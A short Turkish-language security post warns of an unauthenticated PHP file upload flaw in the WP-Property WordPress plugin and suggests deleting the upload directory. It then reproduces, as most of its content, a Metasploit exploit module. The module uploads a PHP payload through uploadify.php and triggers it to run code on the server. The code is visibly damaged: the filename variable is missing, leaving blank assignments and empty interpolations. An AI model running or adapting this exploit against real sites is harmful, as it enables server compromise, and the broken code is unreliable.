WordPress WP-Property versiyonunda PHP File Upload Açığı bulundu. Açık sayesinde php shell upload edilebilmekte, servere erişim sağlanmaktadır. Açığın oluştuğu upload dizinini geçici olarak silmek yerinde olacaktır. Açık metasploit tarafından bulunmuş olup, açığın kullanımına ilişkin exploit aşağıdadır.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##


require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
        Rank = ExcellentRanking

        include Msf::Exploit::Remote::HttpClient
        include Msf::Exploit::PhpEXE

        def initialize(info = {})
                super(update_info(info,
                        'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
                        'Description'    => %q{
                                        This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
                                plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
                                temp directory without authentication, which results in arbitrary code execution.
                        },
                        'Author'         =>
                                [
                                        'Sammy FORGIT', # initial discovery
                                        'James Fitts <fitts.james[at]gmail.com>' # metasploit module
                                ],
                        'License'        => MSF_LICENSE,
                        'References'     =>
                                [
                                        [ 'OSVDB', '82656' ],
                                        [ 'BID', '53787' ],
                                        [ 'EDB', '18987'],
                                        [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
                                ],
                        'Payload'            =>
                                {
                                        'BadChars' => "\x00",
                                },
                        'Platform'       => 'php',
                        'Arch'               => ARCH_PHP,
                        'Targets'        =>
                                [
                                        [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
                                        [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
                                ],
                        'DefaultTarget'  => 0,
                        'DisclosureDate' => 'Mar 26 2012'))

                register_options(
                        [
                                OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
                        ], self.class)
        end

        def check
                uri =  target_uri.path
                uri << '/' if uri[-1,1] != '/'

                res = send_request_cgi({
                        'method' => 'GET',
                        'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
                })

                if not res or res.code != 200
                        return Exploit::CheckCode::Unknown
                end

                return Exploit::CheckCode::Appears
        end

        def exploit
                uri =  target_uri.path
                uri << '/' if uri[-1,1] != '/'

                peer = "#{rhost}:#{rport}"

                 = "#{rand_text_alpha(5)}.php"
                php_payload = get_write_exec_payload(:unlink_self=>true)

                data = Rex::MIME::Message.new
                data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{}\"")
                data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
                post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

                print_status("#{peer} - Uploading payload #{}")
                res = send_request_cgi({
                        'method' => 'POST',
                        'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
                        'ctype'  => "multipart/form-data; boundary=#{data.bound}",
                        'data'   => post_data
                })

                if not res or res.code != 200 or res.body !~ /#{}/
                        fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
                end

                upload_uri = res.body

                print_status("#{peer} - Executing payload #{}")
                res = send_request_raw({
                        'uri'    => upload_uri,
                        'method' => 'GET'
                })
        end
end